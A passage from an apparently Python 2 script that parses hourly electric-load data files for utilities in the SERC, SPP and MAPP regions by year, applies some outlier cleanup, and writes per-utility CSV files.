1996 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1996/ODECV96' % (fulldir)).readlines()[3:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1997 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1997/ODECV97' % (fulldir)).readlines()[4:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1998 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1998/ODECV98' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1999 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1999/ODECV99' % (fulldir)).readlines()[2:]]).iloc[:, 3:].values.ravel()).str.replace('[^\d]', '').replace('', '0').astype(float).values,
2000 : pd.DataFrame([i.split() for i in open('%s/serc/2000/ODECV00' % (fulldir)).readlines()[3:]])[4].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/serc/2001/ODECV01' % (fulldir)).readlines()[3:]])[4].dropna().str.replace('[N/A]', '').replace('', '0').astype(float).values,
2002 : pd.DataFrame([i.split() for i in open('%s/serc/2002/ODECV02' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2003 : pd.DataFrame([i.split() for i in open('%s/serc/2003/ODECV03' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values,
2004 : pd.DataFrame([i.split() for i in open('%s/serc/2004/ODECV04' % (fulldir)).readlines()[5:]])[4].str.replace('[N/A]', '').replace('', '0').astype(float).values
},
195 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/APCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/APCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Alabama'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 2].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Alabama'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 2].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 2].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 1].values
},
7140 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).replace(np.nan, 0).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Georgia'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 3].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Georgia'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 3].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 3].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 2].values
},
7801 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/GUCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/GUCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Gulf'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 4].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Gulf'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 4].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 4].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 3].values
},
12686 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/MPCO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/MPCO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Mississippi'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 5].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Mississippi'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 5].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 5].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 4].values
},
16687 : {
1993 : pd.Series(pd.DataFrame([i.split() for i in open('%s/serc/1993/SECO93' % (fulldir)).readlines()[:-1]]).iloc[:,-1].values).str.replace('[^\d]', '').replace('', '0').astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/serc/1994/SECO94' % (fulldir)).readlines()[:-1]]).iloc[:, 1:].astype(float).values.ravel(),
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['Savannah'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 6].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Savannah'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 6].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 6].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 5].values
},
18195 : {
1999 : pd.read_excel('%s/serc/1999/SOCO99' % (fulldir))['System'].dropna().values,
2000 : pd.read_excel('%s/serc/2000/SOCO00' % (fulldir), skiprows=1).iloc[:, 7].values,
2001 : pd.read_excel('%s/serc/2001/SOCO01' % (fulldir))['Southern'].values,
2002 : pd.read_excel('%s/serc/2002/SOCO02' % (fulldir), skiprows=1).iloc[:, 7].values,
2003 : pd.read_excel('%s/serc/2003/SOCO03' % (fulldir)).iloc[:, 8].values,
2004 : pd.read_excel('%s/serc/2004/SOCO04' % (fulldir), skiprows=1).iloc[:, 7].values
}
}
serc.update({40229 : {}})
for i in serc[402290].keys():
serc[40229][i] = serc[402290][i] + serc[402291][i]
serc[189][2001][serc[189][2001] > 2000] = 0
serc[3408][2002][serc[3408][2002] > 2000] = 0
serc[3408][2003][serc[3408][2003] > 2000] = 0
serc[7140][1999][serc[7140][1999] < 0] = 0
serc[7140][1994][serc[7140][1994] > 20000] = 0
if not os.path.exists('./serc'):
os.mkdir('serc')
for k in serc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(serc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(serc[k][i]))) for i in serc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./serc/%s.csv' % k)
###### SPP
# AECC: 807
# CAJN: 2777
# CLEC: 3265
# EMDE: 5860
# ENTR: 12506
# KCPU: 9996
# LEPA: 26253
# LUS: 9096
# GSU: 55936 <- 7806
# MPS: 12699
# OKGE: 14063
# OMPA: 14077
# PSOK: 15474
# SEPC: 18315
# WFEC: 20447
# WPEK: 20391
# CSWS: 3283
# SRGT: 40233
# GSEC: 7349
spp = {
807 : {
1993 : pd.read_csv('%s/spp/1993/AECC93' % (fulldir), skiprows=6, skipfooter=1, header=None).iloc[:, -1].values,
1994 : pd.read_csv('%s/spp/1994/AECC94' % (fulldir), skiprows=8, skipfooter=1, header=None).iloc[:, -1].values,
1995 : pd.read_csv('%s/spp/1995/AECC95' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1996 : pd.read_csv('%s/spp/1996/AECC96' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1997 : pd.read_csv('%s/spp/1997/AECC97' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/AECC98' % (fulldir), skiprows=9, skipfooter=1, header=None).iloc[:, -1].values,
1999 : pd.read_csv('%s/spp/1999/AECC99' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/AECC03' % (fulldir), skiprows=5, skipfooter=1, header=None).iloc[:, -2].values,
2004 : pd.read_csv('%s/spp/2004/AECC04' % (fulldir), skiprows=5, header=None).iloc[:, -2].values
},
2777 : {
1998 : pd.read_excel('%s/spp/1998/CAJN98' % (fulldir), skiprows=4).iloc[:365, 1:].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CAJN99' % (fulldir)).readlines()[:]])[2].astype(float).values
},
3265 : {
1994 : pd.read_fwf('%s/spp/1994/CLEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/CLEC96' % (fulldir)).readlines()[:]])[0].astype(float).values,
1997 : pd.read_csv('%s/spp/1997/CLEC97' % (fulldir)).iloc[:, 2].str.replace(',', '').astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/CLEC98' % (fulldir)).readlines()[:]])[1].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/CLEC99' % (fulldir)).readlines()[1:]]).iloc[:, 0].astype(float).values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/CLEC01' % (fulldir)).readlines()[:]])[4].replace('NA', '0').astype(float).values,
},
5860 : {
1997 : pd.DataFrame([i.split() for i in open('%s/spp/1997/EMDE97' % (fulldir)).readlines()[:]])[3].astype(float).values,
1998 : pd.DataFrame([i.split() for i in open('%s/spp/1998/EMDE98' % (fulldir)).readlines()[2:-2]])[2].astype(float).values,
1999 : pd.DataFrame([i.split() for i in open('%s/spp/1999/EMDE99' % (fulldir)).readlines()[3:8763]])[2].astype(float).values,
2001 : pd.read_excel('%s/spp/2001/EMDE01' % (fulldir))['Load'].dropna().values,
2002 : pd.read_excel('%s/spp/2002/EMDE02' % (fulldir))['Load'].dropna().values,
2003 : pd.read_excel('%s/spp/2003/EMDE03' % (fulldir))['Load'].dropna().values,
2004 : pd.read_excel('%s/spp/2004/EMDE04' % (fulldir), skiprows=2).iloc[:8784, -1].values
},
12506 : {
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/ENTR94' % (fulldir)).readlines()[:]]).iloc[:, 1:-1].astype(float).values.ravel(),
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/ENTR95' % (fulldir)).readlines()[1:-2]]).iloc[:, 1:-1].astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/ENTR97' % (fulldir), header=None).iloc[:, 1:-1].astype(float).values.ravel(),
1998 : pd.read_csv('%s/spp/1998/ENTR98' % (fulldir), header=None)[2].astype(float).values,
1999 : pd.read_excel('%s/spp/1999/ENTR99' % (fulldir)).iloc[:, -1].values,
2000 : pd.DataFrame([i.split() for i in open('%s/spp/2000/ENTR00' % (fulldir)).readlines()[4:]]).iloc[:, 3:].astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/ENTR01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
9996 : {
1994 : pd.read_fwf('%s/spp/1994/KCPU94' % (fulldir), skiprows=4, header=None).astype(str).apply(lambda x: x.str[-3:]).astype(float).values.ravel(),
1997 : pd.read_csv('%s/spp/1997/KCPU97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/KCPU98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/spp/1999/KCPU99' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2000 : pd.read_csv('%s/spp/2000/KCPU00' % (fulldir), engine='python', header=None)[0].values,
2002 : pd.read_excel('%s/spp/2002/KCPU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/KCPU03' % (fulldir), engine='python', header=None)[0].values,
2004 : pd.read_csv('%s/spp/2004/KCPU04' % (fulldir), engine='python', header=None)[0].values
},
26253 : {
1993 : pd.read_csv('%s/spp/1993/LEPA93' % (fulldir), skiprows=3, header=None)[0].values,
1994 : pd.read_csv('%s/spp/1994/LEPA94' % (fulldir), skiprows=3, header=None)[0].values,
1995 : pd.read_csv('%s/spp/1995/LEPA95' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1996 : pd.read_csv('%s/spp/1996/LEPA96' % (fulldir), sep='\t', skiprows=1, header=None)[2].values,
1997 : pd.read_csv('%s/spp/1997/LEPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None),
1998 : pd.Series(pd.read_csv('%s/spp/1998/LEPA98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[[1,3]].values.ravel(order='F')).dropna().values,
1999 : pd.read_csv('%s/spp/1999/LEPA99' % (fulldir), sep='\t')['Load'].values,
2001 : pd.read_csv('%s/spp/2001/LEPA01' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2002 : pd.read_csv('%s/spp/2002/LEPA02' % (fulldir), engine='python', sep='\t', header=None)[1].values,
2003 : pd.read_excel('%s/spp/2003/LEPA03' % (fulldir), header=None)[1].values
},
9096 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/LUS93' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1994 : pd.DataFrame([i.split() for i in open('%s/spp/1994/LUS94' % (fulldir)).readlines()[3:-1]]).iloc[:, -1].astype(float).values,
1995 : pd.DataFrame([i.split() for i in open('%s/spp/1995/LUS95' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1996 : pd.DataFrame([i.split() for i in open('%s/spp/1996/LUS96' % (fulldir)).readlines()[4:-1]]).iloc[:, -1].astype(float).values,
1997 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1997/LUS97' % (fulldir)).readlines()[3:-2]]).iloc[:, -1].astype(float).values,
1998 : pd.DataFrame([i.split('\t') for i in open('%s/spp/1998/LUS98' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
1999 : pd.DataFrame([i.split(' ') for i in open('%s/spp/1999/LUS99' % (fulldir)).readlines()[4:]]).iloc[:, -1].astype(float).values,
2000 : pd.read_csv('%s/spp/2000/LUS00' % (fulldir), skiprows=3, skipfooter=1, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/LUS01' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/LUS02' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2003 : pd.read_csv('%s/spp/2003/LUS03' % (fulldir), skiprows=3, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/spp/2004/LUS04' % (fulldir), skiprows=4, header=None).iloc[:, -1].values
},
55936 : {
1993 : pd.read_csv('%s/spp/1993/GSU93' % (fulldir), engine='python', header=None)[0].values
},
12699 : {
1993 : pd.read_csv('%s/spp/1993/MPS93' % (fulldir), sep=' ', skipinitialspace=True)['TOTLOAD'].values,
1996 : pd.read_excel('%s/spp/1996/MPS96' % (fulldir), skiprows=6, header=None).iloc[:, -1].values,
1998 : pd.read_csv('%s/spp/1998/MPS98' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2000 : pd.read_csv('%s/spp/2000/MPS00' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2001 : pd.read_csv('%s/spp/2001/MPS01' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2002 : pd.read_csv('%s/spp/2002/MPS02' % (fulldir), sep=' ', skipinitialspace=True, header=None).iloc[:, -1].values,
2003 : pd.read_excel('%s/spp/2003/MPS03' % (fulldir)).iloc[:, 1:].values.ravel()
},
14063 : {
1994 : pd.read_csv('%s/spp/1994/OKGE94' % (fulldir), header=None).iloc[:, 1:13].values.ravel()
},
14077 : {
1993 : pd.read_csv('%s/spp/1993/OMPA93' % (fulldir), skiprows=2, header=None, sep=' ', skipinitialspace=True, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/spp/1997/OMPA97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/spp/1998/OMPA98' % (fulldir), skiprows=2, engine='python', header=None)[0].str.replace('\*', '').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/OMPA00' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2001 : pd.read_csv('%s/spp/2001/OMPA01' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2002 : pd.read_csv('%s/spp/2002/OMPA02' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2003 : pd.read_csv('%s/spp/2003/OMPA03' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000,
2004 : pd.read_csv('%s/spp/2004/OMPA04' % (fulldir), skiprows=2, engine='python', header=None)[0].astype(float).values/1000
},
15474 : {
1993 : pd.read_fwf('%s/spp/1993/PSOK93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
18315 : {
1993 : pd.read_csv('%s/spp/1993/SEPC93' % (fulldir), header=None).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('NA', '').str.strip()).replace('', '0').astype(float).values.ravel(),
1997 : (pd.read_fwf('%s/spp/1997/SEPC97' % (fulldir), skiprows=1, header=None)[5]/1000).values,
1999 : pd.read_csv('%s/spp/1999/SEPC99' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].str.strip().replace('#VALUE!', '0').astype(float).values,
2000 : pd.read_csv('%s/spp/2000/SEPC00' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2001 : pd.read_csv('%s/spp/2001/SEPC01' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
2002 : (pd.read_fwf('%s/spp/2002/SEPC02' % (fulldir), skiprows=1, header=None)[6]).str.replace('"', '').str.strip().astype(float).values,
2004 : pd.read_csv('%s/spp/2004/SEPC04' % (fulldir), header=None, sep='\t')[5].values
},
20447 : {
1993 : pd.read_csv('%s/spp/1993/WFEC93' % (fulldir)).iloc[:, 0].values,
2000 : pd.read_csv('%s/spp/2000/WFEC00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[0].values
},
20391 : {
1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/WPEK93' % (fulldir)).readlines()[:]]).iloc[:365, 1:25].astype(float).values.ravel(),
1996 : pd.read_excel('%s/spp/1996/WPEK96' % (fulldir), skiprows=2).dropna().iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/WPEK98' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2000 : pd.read_csv('%s/spp/2000/WPEK00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2001 : pd.read_csv('%s/spp/2001/WPEK01' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
2002 : pd.read_csv('%s/spp/2002/WPEK02' % (fulldir), header=None, sep=' ', skipinitialspace=True)[4].values
},
3283 : {
1997 : pd.read_fwf('%s/spp/1997/CSWS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/CSWS98' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True, header=None)[2].values,
1999 : pd.read_csv('%s/spp/1999/CSWS99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[2].values,
2000 : pd.read_csv('%s/spp/2000/CSWS00' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None)[2].values
},
40233 : {
2000 : pd.read_fwf('%s/spp/2000/SRGT00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/spp/2001/SRGT01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
7349 : {
1997 : pd.read_csv('%s/spp/1997/GSEC97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_csv('%s/spp/1998/GSEC98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/spp/1999/GSEC99' % (fulldir), sep='\s', skipinitialspace=True, skiprows=2, header=None)[17].dropna().values,
2000 : pd.read_csv('%s/spp/2000/GSEC00' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/GSEC01' % (fulldir)).readlines()[1:]])[0].astype(float).values,
2002 : pd.read_csv('%s/spp/2002/GSEC02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[5].values,
2003 : pd.read_csv('%s/spp/2003/GSEC03' % (fulldir), header=None)[2].values,
2004 : (pd.read_csv('%s/spp/2004/GSEC04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[5]/1000).values
}
}
spp[9096][2003][spp[9096][2003] > 600] = 0
spp[9996][2002] = np.repeat(np.nan, len(spp[9996][2002]))
spp[7349][2003] = np.repeat(np.nan, len(spp[7349][2003]))
if not os.path.exists('./spp'):
os.mkdir('spp')
for k in spp.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(spp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(spp[k][i]))) for i in spp[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./spp/%s.csv' % k)
###### MAPP
# CIPC: 3258
# CP: 4322
# CBPC: 4363
# DPC: 4716
# HUC: 9130
# IES: 9219
# IPW: 9417 <- 9392
# IIGE: 9438
# LES: 11018
# MPL: 12647
# MPC: 12658
# MDU: 12819
# MEAN: 21352
# MPW: 13143
# NPPD: 13337
# NSP: 13781
# NWPS: 13809
# OPPD: 14127
# OTP: 14232
# SMMP: 40580
# UPA: 19514
# WPPI: 20858
# MEC: 12341 <- 9435
# CPA: 4322
# MWPS: 23333
mapp = {
3258 : {
1998 : pd.read_fwf('%s/mapp/1998/CIPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
4363 : {
1993 : pd.read_fwf('%s/mapp/1993/CBPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CBPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CBPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/CBPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/CBPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/CB02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
4716 : {
1993 : pd.read_fwf('%s/mapp/1993/DPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/DPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_csv('%s/mapp/1996/DPC96' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 6:].values.ravel()
},
9130 : {
1993 : pd.read_fwf('%s/mapp/1993/HUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/HUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/HUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/HUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/HUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/HUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/HUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/HUC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9219 : {
1993 : pd.read_fwf('%s/mapp/1993/IESC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IESC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IESC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9417 : {
1993 : pd.read_fwf('%s/mapp/1993/IPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
